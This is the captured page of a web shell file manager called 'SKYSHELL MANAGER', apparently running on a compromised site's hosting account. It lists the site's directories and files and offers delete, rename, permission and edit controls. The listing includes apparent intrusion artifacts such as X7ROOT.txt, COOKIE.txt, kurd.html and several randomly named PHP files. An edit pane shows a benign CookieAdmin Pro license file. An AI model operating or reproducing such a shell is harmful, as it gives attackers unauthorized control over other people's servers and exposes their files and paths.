📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: license.php
<?php /* * CookieAdmin Pro * https://cookieadmin.net * (c) Softaculous Team */ namespace CookieAdminPro; if(!defined('ABSPATH')){ die('Hacking Attempt!'); } class License{ static function cookieadmin_pro_license(){ global $lic_resp, $cookieadmin_lang, $cookieadmin_error, $cookieadmin_msg; if(empty($_POST['cookieadmin_pro_license_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['cookieadmin_pro_license_nonce'])), 'cookieadmin_pro_license')){ $cookieadmin_error = __('Security Check Failed', 'cookieadmin'); return; } $license = !empty($_POST['cookieadmin_pro_license']) ? sanitize_key(wp_unslash($_POST['cookieadmin_pro_license'])) : ''; if(empty($license)){ $cookieadmin_error = __('The license key was not submitted', 'cookieadmin'); return; } cookieadmin_pro_load_license($license); if(!is_array($lic_resp)){ $cookieadmin_error = __('The response was malformed', 'cookieadmin').' '.esc_html($lic_resp); return; } $json = json_decode($lic_resp['body'], true); if(empty($json['license'])){ $cookieadmin_error = __('The license key is invalid', 'cookieadmin'); return; } $cookieadmin_msg = __('Successfully updated the license key', 'cookieadmin'); } static function cookieadmin_show_license(){ global $cookieadmin; if(isset($_REQUEST['save_cookieadmin_pro_license'])){ \CookieAdminPro\License::cookieadmin_pro_license(); } ?> <?php \CookieAdmin\Admin::header_theme(__('License', 'cookieadmin')); ?> <div class="cookieadmin-pro-license-content wrap" > <div class="cookieadmin-pro-tab-group" style=" width:100% ;background:white; padding:20px;"> <table class="wp-list-table fixed striped users cookieadmin-pro-license-table" cellspacing="1" border="0" width="100%" cellpadding="10" align="center"> <tbody> <tr> <th align="left" width="25%"><?php esc_html_e('CookieAdmin Version', 'cookieadmin'); ?></th> <td><?php echo esc_html(COOKIEADMIN_PRO_VERSION).' ('.esc_html__('Pro Version', 'cookieadmin').')'; ?> </td> </tr> <tr> <th align="left" valign="top"><?php esc_html_e('CookieAdmin License', 'cookieadmin'); ?></th> <td align="left"> <form method="post" action=""> <?php echo (defined('COOKIEADMIN_PREMIUM') && empty($cookieadmin['license']['license']) ? '<span style="color:red">'.esc_html__('Unlicensed', 'cookieadmin').'</span> ' : '')?> <input type="hidden" name="cookieadmin_pro_license_nonce" value="<?php echo esc_attr(wp_create_nonce('cookieadmin_pro_license'));?>"/> <input type="text" name="cookieadmin_pro_license" value="<?php echo (empty($cookieadmin['license']['license']) ? '': esc_html($cookieadmin['license']['license']))?>" size="30" placeholder="e.g. COOKA-11111-22222-33333-44444" style="width:300px;"> <input name="save_cookieadmin_pro_license" class="cookieadmin-btn cookieadmin-btn-primary dosmtp-sumbit-licence" value="<?php esc_html_e('Update License', 'cookieadmin')?>" type="submit"> </form> <?php if(!empty($cookieadmin['license']['license'])){ $expires = $cookieadmin['license']['expires']; $expires = substr($expires, 0, 4).'/'.substr($expires, 4, 2).'/'.substr($expires, 6); echo '<div style="margin-top:10px;">'.esc_html__('License Status', 'cookieadmin').' : '.(empty($cookieadmin['license']['status_txt']) ? 'N.A.' : wp_kses_post($cookieadmin['license']['status_txt'])).' '.($cookieadmin['license']['expires'] <= gmdate('Ymd') ? esc_html__('License Expires', 'cookieadmin').' : <span style="color:red;">'.esc_attr($expires).'</span>' : (empty($cookieadmin['license']['has_plid']) ? esc_html__('License Expires', 'cookieadmin').' : '.esc_html($expires) : '')).' </div>'; }?> </td> </tr> <tr> <th align="left">URL</th> <td><?php echo esc_url(get_site_url()); ?></td> </tr> <tr> <th align="left">Path</th> <td><?php echo esc_html(ABSPATH); ?></td> </tr> <tr> <th align="left"><?php esc_html_e('Server\'s IP Address', 'cookieadmin') ?></th> <td><?php echo (isset($_SERVER['SERVER_ADDR']) ? esc_html(sanitize_text_field(wp_unslash($_SERVER['SERVER_ADDR']))) : ''); ?></td> </tr> </tbody> </table> </div> </div> <?php \CookieAdmin\Admin::footer_theme(); } }
Save